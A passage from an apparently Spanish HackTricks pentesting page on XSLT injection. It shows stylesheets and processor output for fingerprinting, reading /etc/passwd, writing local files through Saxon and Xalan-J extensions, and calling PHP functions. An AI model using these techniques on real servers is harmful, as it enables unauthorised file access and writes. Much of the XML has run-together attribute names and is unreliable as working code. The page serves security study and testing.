¿Trabajas en una empresa de ciberseguridad? ¿Quieres ver tu empresa anunciada en HackTricks? ¿O quieres tener acceso a la última versión del PEASS o descargar HackTricks en PDF? ¡Consulta los PLANES DE SUSCRIPCIÓN!
XSLT es una tecnología utilizada para transformar documentos XML en diferentes formatos. Viene en tres versiones: 1, 2 y 3, siendo la versión 1 la más comúnmente utilizada. El proceso de transformación puede ejecutarse en el servidor o en el navegador.
<?xml version="1.0" encoding="UTF-8"?><xsl:stylesheetversion="1.0"xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:templatematch="/"><html><body><h2>The Super title</h2><tableborder="1"><trbgcolor="#9acd32"><th>Title</th><th>artist</th></tr><tr><td><xsl:value-ofselect="catalog/cd/title"/></td><td><xsl:value-ofselect="catalog/cd/artist"/></td></tr></table></body></html></xsl:template></xsl:stylesheet>
Ejecutar:
saxonb-xslt -xsl:xsl.xsl xml.xmlWarning: at xsl:stylesheet on line 2 column 80 of xsl.xsl:Running an XSLT 1.0 stylesheet with an XSLT 2.0 processor<html><body><h2>The Super title</h2><tableborder="1"><trbgcolor="#9acd32"><th>Title</th><th>artist</th></tr><tr><td>CD Title</td><td>The artist</td></tr></table></body></html>
$saxonb-xslt -xsl:detection.xsl xml.xmlWarning: at xsl:stylesheet on line 2 column 80 of detection.xsl:Running an XSLT 1.0 stylesheet with an XSLT 2.0 processor<h2>XSLT identification</h2><b>Version:</b>2.0<br><b>Vendor:</b>SAXON 9.1.0.8 from Saxonica<br><b>Vendor URL:</b>http://www.saxonica.com/<br>
$ saxonb-xslt -xsl:read.xsl xml.xmlWarning: at xsl:stylesheet on line 1 column 111 of read.xsl:Running an XSLT 1.0 stylesheet with an XSLT 2.0 processor<?xml version="1.0" encoding="UTF-8"?>root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologinbin:x:2:2:bin:/bin:/usr/sbin/nologinsys:x:3:3:sys:/dev:/usr/sbin/nologinsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/usr/sbin/nologinman:x:6:12:man:/var/cache/man:/usr/sbin/nologinlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
SSRF (Server-Side Request Forgery) es una vulnerabilidad que permite a un atacante influir en las solicitudes que un servidor web realiza en su nombre.
<?xml version="1.0" encoding="utf-8"?><xsl:stylesheetversion="1.0"xmlns:xsl="http://www.w3.org/1999/XSL/Transform"xmlns:php="http://php.net/xsl" ><xsl:templatematch="/"><xsl:result-documenthref="local_file.txt"><xsl:text>Write Local File</xsl:text></xsl:result-document></xsl:template></xsl:stylesheet>
Extensión Xalan-J
<xsl:templatematch="/"><redirect:openfile="local_file.txt"/><redirect:writefile="local_file.txt"/> Write Local File</redirect:write><redirect:closefile="loxal_file.txt"/></xsl:template>
La siguiente función llamará al método estático stringToUrl de la clase XSL:
<!--- More complex test to call php class function--><xsl:stylesheetxmlns:xsl="http://www.w3.org/1999/XSL/Transform"xmlns:php="http://php.net/xsl"version="1.0"><xsl:outputmethod="html"version="XHTML 1.0"encoding="UTF-8"indent="yes" /><xsl:templatematch="root"><html><!-- We use the php suffix to call the static class function stringToUrl() --><xsl:value-ofselect="php:function('XSL::stringToUrl','une_superstring-àÔ|modifier')" /><!-- Output: 'une_superstring ao modifier' --></html></xsl:template></xsl:stylesheet>
¿Trabajas en una empresa de ciberseguridad? ¿Quieres ver tu empresa anunciada en HackTricks? ¿O quieres tener acceso a la última versión del PEASS o descargar HackTricks en PDF? ¡Consulta los PLANES DE SUSCRIPCIÓN!
